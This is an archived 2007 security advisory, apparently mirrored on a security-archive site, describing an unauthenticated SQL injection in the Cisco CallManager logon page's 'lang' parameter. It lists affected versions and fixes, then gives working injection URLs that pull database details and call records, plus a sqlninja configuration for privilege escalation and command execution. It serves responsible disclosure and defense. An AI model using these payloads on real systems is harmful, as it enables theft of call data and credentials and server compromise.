Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Cisco :: tb12358.htm

SQL Injection in Cisco CallManager



SQL Injection in Cisco CallManager
SQL Injection in Cisco CallManager




--DvifzEOEABd5jzbd
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable

SUMMARY
======
A SQL injection vulnerability exists in the Log On page of the web
interface for Cisco CallManager AKA Unified Communications Manager. An
unauthenticated attacker who is able to access the Log On page could
exploit this vulnerability to run arbitrary SQL commands as the logged
in database user, usually cm_publisher. By running SQL commands, the
attacker could gain information about the CallManager configuration,
including call records.

AFFECTED SOFTWARE
================
* Cisco CallManager prior to v3.3(5)sr2b
* Cisco CallManager prior to v4.1(3)sr5
* Cisco CallManager prior to v4.2(3)sr2
* Cisco CallManager prior to v4.3(1)sr1

Note that I have not personally tested these products - I am simply
reproducing Cisco's information on the issue.

IMPACT
=====
An attacker who is able to access the Log On page could harvest a large
amount of data about the Cisco VOIP environment - 260 tables in two
databases. Depending on the target system's configuration, this data
may include sensitive information such as passwords
(ccm0306..PilotUser.Password, ccm0306..syspublications.ftp_password,
ccm0306..sysusers.password) and call records (cdr..CallDetailRecord.*).

The default database user does not appear to have sufficient privileges
to perform operations more destructive than simple SELECT statements -
no INSERT, UPDATE, DELETE, DROP, etc.

It may be possible to use attacks against the exposed MS SQL database
in order to expand the impact of this vulnerability - see Advanced
Exploitation, below.

DETAILS
======
The log on page of the Cisco Unified CallManager web interface performs
insufficient checking of the "lang" HTTP GET variable before passing it
into a SQL query. By providing a specially crafted lang variable, an
attacker could trick the backend MS SQL server into executing arbitrary
SQL queries as the logged in user.

The affected query returns only a single value, and that value is
placed in a Javascript include URL which is not visible in the rendered
HTML page. As a result, practical exploitation of this vulnerability
can be difficult. Security professionals wishing to test the
vulnerability against their own systems may wish to write wrapper code
to make running repeated queries less tedious.

SOLUTION
=======
- Upgrade to an unaffected version of Cisco CallManager

- Enable the URLScan ISAPI filter. This filter ships with CCM and
restricts the maximum length of form fields, making this vulnerability
difficult or impossible to exploit.


EXPLOIT
======
To see the returned data from these exploit URLs, view the source of
the returned page and look for a line like this:



The string "123" is the value returned from the database.

Examples:

Display the logged-in database user.

https://0.0.0.0/CCMUser/logon.asp?lang=en'+union+select+CURRENT_USER;select+tkUserLocale+from+UserLocaleBrowserLanguageMap+M+where+''='

Display the selected database.

https://0.0.0.0/CCMUser/logon.asp?lang=en'+union+select+db_name();select+tkUserLocale+from+UserLocaleBrowserLanguageMap+M+where+''='

Display the UNIX time at which a call was made from extension 12345.

https://0.0.0.0/CCMUser/logon.asp?lang=en'+union+select+top+1+convert(char(12),dateTimeOrigination)+from+cdr..CallDetailRecord+where+finalCalledPartyNumber+%3C%3E+''+and+callingPartyNumber='12345';select+tkUserLocale+from+UserLocaleBrowserLanguageMap+M+where+''='

Display the destination number for that call. Replace "1174900000" with
the value from the previous query.

https://0.0.0.0/CCMUser/logon.asp?lang=en'+union+select+top+1+finalCalledPartyNumber+from+cdr..CallDetailRecord+where+callingPartyNumber='12345'+and+dateTimeOrigination=1174900000;select+tkUserLocale+from+UserLocaleBrowserLanguageMap+M+where+''='

ADVANCED EXPLOITATION
====================
Several free tools exist to automate attacking SQL injection
vulnerabilities like this one. Depending on the configuration of the
target server, it may be possible to escalate database privileges or
run arbitrary system commands.

For example, icesurfer's excellent sqlninja tool (>= 0.1.3) can be used
to detemine various information about the server hosting the
CallManager install, launch a brute-force attack against the database
"sa" account password, and run arbitrary commands on the server if the
"sa" attack succeeds.

http://sqlninja.sourceforge.net/ 

The following parameters should be specified in the sqlninja.conf file:

page = /ccmuser/logon.asp
stringstart = lang=en';
stringend = select tkUserLocale from UserLocaleBrowserLanguageMap M where ''='
appendcomment = no

In at least one instance, an unsuccessful brute-force attack against
the "sa" password led to denial-of-service conditions on the
CallManager server.

CREDITS
======
Brandeis University worked with Cisco to release this information in a
responsible manner. Cisco has released a Security Advisory on this
issue at:

http://www.cisco.com/warp/public/707/cisco-sa-20070829-ccm.shtml 

I would also like to thank icesurfer for his work modifying sqlninja to
work with this exploit.

REVISION HISTORY
===============
2007-08-30  original release

-- 
Elliot Kendall  
Network Security Architect
Brandeis University

Trouble replying? See http://people.brandeis.edu/~ekendall/sign/ 

--DvifzEOEABd5jzbd
Content-Type: application/x-pkcs7-signature
Content-Disposition: attachment; filename="smime.p7s"
Content-Transfer-Encoding: base64

MIIItAYJKoZIhvcNAQcCoIIIpTCCCKECAQExCzAJBgUrDgMCGgUAMAsGCSqGSIb3DQEHAaCC
BiswggLkMIICTaADAgECAhBggvMqYGnmWTL8QHFRd45JMA0GCSqGSIb3DQEBBQUAMGIxCzAJ
BgNVBAYTAlpBMSUwIwYDVQQKExxUaGF3dGUgQ29uc3VsdGluZyAoUHR5KSBMdGQuMSwwKgYD
VQQDEyNUaGF3dGUgUGVyc29uYWwgRnJlZW1haWwgSXNzdWluZyBDQTAeFw0wNjExMjIxOTA3
MzJaFw0wNzExMjIxOTA3MzJaMEcxHzAdBgNVBAMTFlRoYXd0ZSBGcmVlbWFpbCBNZW1iZXIx
JDAiBgkqhkiG9w0BCQEWFWVrZW5kYWxsQGJyYW5kZWlzLmVkdTCCASIwDQYJKoZIhvcNAQEB
BQADggEPADCCAQoCggEBAO9eDtuy41oKi2lWSjfmLhH9Essvghz1h96Hqdh+AYkEz1wEJWG5
ovCDBzrekBdRkXB8vN1p8CV4jfyI2u2Ahrbiv33h45ComeVKMc1lUmMTdICfe5SHzj0+0fK2
G2dUHS6t5CEG2Dy1pZBN3+4dyun3VkkYGJB6IYuvGVxwH8YUw8Dc/SmWBOtLTPjDZ8kZVQyC
o+rzDVGFNJVYmjOy9+n0EEgVgNTmgAQGSlWFpR7jnBgjB0ppicKQse9sj/OW33cCHYmcxO85
pYySx+glldHfUiHD2YqNiMOjiBF0n/Q9kLQh/IyzVbRue5efYvwCGSsjb3LBVAHg6JPg+Rcq
zpECAwEAAaMyMDAwIAYDVR0RBBkwF4EVZWtlbmRhbGxAYnJhbmRlaXMuZWR1MAwGA1UdEwEB
/wQCMAAwDQYJKoZIhvcNAQEFBQADgYEAmZlx5KZcqutjgUk1vgyPtnx/ptHdLo8iHiyVGrSj
5Hc/zl4+QOLHBQU/0NCAkzPQFSl/LUQYsMefBo9enPIY79OUFO9gThclvpr3WmghB+agvVxf
Skm4VoxKsWtrBX46FDafeRuCGdRxvR1IhT0sc7Un7Rc1J5OitkVwxegEsj8wggM/MIICqKAD
AgECAgENMA0GCSqGSIb3DQEBBQUAMIHRMQswCQYDVQQGEwJaQTEVMBMGA1UECBMMV2VzdGVy
biBDYXBlMRIwEAYDVQQHEwlDYXBlIFRvd24xGjAYBgNVBAoTEVRoYXd0ZSBDb25zdWx0aW5n
MSgwJgYDVQQLEx9DZXJ0aWZpY2F0aW9uIFNlcnZpY2VzIERpdmlzaW9uMSQwIgYDVQQDExtU
aGF3dGUgUGVyc29uYWwgRnJlZW1haWwgQ0ExKzApBgkqhkiG9w0BCQEWHHBlcnNvbmFsLWZy
ZWVtYWlsQHRoYXd0ZS5jb20wHhcNMDMwNzE3MDAwMDAwWhcNMTMwNzE2MjM1OTU5WjBiMQsw
CQYDVQQGEwJaQTElMCMGA1UEChMcVGhhd3RlIENvbnN1bHRpbmcgKFB0eSkgTHRkLjEsMCoG
A1UEAxMjVGhhd3RlIFBlcnNvbmFsIEZyZWVtYWlsIElzc3VpbmcgQ0EwgZ8wDQYJKoZIhvcN
AQEBBQADgY0AMIGJAoGBAMSmPFVzVftOucqZWh5owHUEcJ3f6f+jHuy9zfVb8hp2vX8MOmHy
v1HOAdTlUAow1wJjWiyJFXCO3cnwK4Vaqj9xVsuvPAsH5/EfkTYkKhPPK9Xzgnc9A74r/rsY
Pge/QIACZNenprufZdHFKlSFD0gEf6e20TxhBEAeZBlyYLf7AgMBAAGjgZQwgZEwEgYDVR0T
AQH/BAgwBgEB/wIBADBDBgNVHR8EPDA6MDigNqA0hjJodHRwOi8vY3JsLnRoYXd0ZS5jb20v
VGhhd3RlUGVyc29uYWxGcmVlbWFpbENBLmNybDALBgNVHQ8EBAMCAQYwKQYDVR0RBCIwIKQe
MBwxGjAYBgNVBAMTEVByaXZhdGVMYWJlbDItMTM4MA0GCSqGSIb3DQEBBQUAA4GBAEiM0VCD
6gsuzA2jZqxnD3+vrL7CF6FDlpSdf0whuPg2H6otnzYvwPQcUCCTcDz9reFhYsPZOhl+hLGZ
GwDFGguCdJ4lUJRix9sncVcljd2pnDmOjCBPZV+V2vf3h9bGCE6u9uo05RAaWzVNd+NWIXiC
3CEZNd4ksdMdRv9dX2VPMYICUTCCAk0CAQEwdjBiMQswCQYDVQQGEwJaQTElMCMGA1UEChMc
VGhhd3RlIENvbnN1bHRpbmcgKFB0eSkgTHRkLjEsMCoGA1UEAxMjVGhhd3RlIFBlcnNvbmFs
IEZyZWVtYWlsIElzc3VpbmcgQ0ECEGCC8ypgaeZZMvxAcVF3jkkwCQYFKw4DAhoFAKCBsTAY
BgkqhkiG9w0BCQMxCwYJKoZIhvcNAQcBMBwGCSqGSIb3DQEJBTEPFw0wNzA4MzAxNzA2Mjda
MCMGCSqGSIb3DQEJBDEWBBQe/p3w15ntxgTtdg/mXvK/loclDTBSBgkqhkiG9w0BCQ8xRTBD
MAoGCCqGSIb3DQMHMA4GCCqGSIb3DQMCAgIAgDANBggqhkiG9w0DAgIBQDAHBgUrDgMCBzAN
BggqhkiG9w0DAgIBKDANBgkqhkiG9w0BAQEFAASCAQDiPodG3F7hELv3bh/LEhR6aCJna3Mc
L5ouTxRvZFg4dMEe3yYxUCXqrYtsBBaSWKN7CAKwfXTsm5ZGQfyqaHR54d8WBFgZeiPSwPVS
moo1i6diUqETumutdTMvle+w56EEH+cAnZDwu32QbIFDE4ffuptNSlHmbCXFdLt7aKfKmbBG
uJxpuDG3K/KtK9EdOff3Gp5jKzqdpoWz46+MvRKpKvlcVEqnA7c1mjBjcQ5NdypdnQXEbzlg
pCkYAwF/GLvKZOd1iWp19jxytSP31+P5JXxdnDn+0+IQfzWglAMZJMegckqzCuYMwmrBI9HS
dlqdZIzD33SjQxf0AkJN5yrQ

--DvifzEOEABd5jzbd--


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH